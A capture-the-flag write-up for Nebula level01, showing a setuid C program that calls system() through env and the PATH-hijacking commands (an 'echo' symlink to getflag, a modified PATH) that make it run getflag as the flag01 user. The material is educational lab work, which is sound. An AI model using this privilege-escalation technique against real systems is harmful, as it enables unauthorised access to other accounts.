Nebula level01 write-up

In Level01 , we are given the following vulnerable c program:

#include <stdlib.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
 gid_t gid;
 uid_t uid;
 gid = getegid();
 uid = geteuid();

 setresgid(gid, gid, gid);
 setresuid(uid, uid, uid);

 system("/usr/bin/env echo and now what?");
}

This is the code of the /home/flag01/flag01 program that runs as flag01 user

level01@nebula:~$ ls -la /home/flag01/flag01
-rwsr-x--- 1 flag01 level01 7322 Nov 20  2011 /home/flag01/flag01

As setresuid sets the Real, Effective and Saved uids to the effective one (flag01), the following call to system will effectively run as flag01. We just a need to run the getflag program instead. In order to do that, we will create a symbolic link to getflag in our home diretory and call it echo. Now we only need to modify the PATH environment variable.

level01@nebula:~$ ln -s /bin/getflag echo
level01@nebula:~$ export PATH=/home/level01:$PATH
level01@nebula:~$ /home/flag01/flag01
You have successfully executed getflag on a target account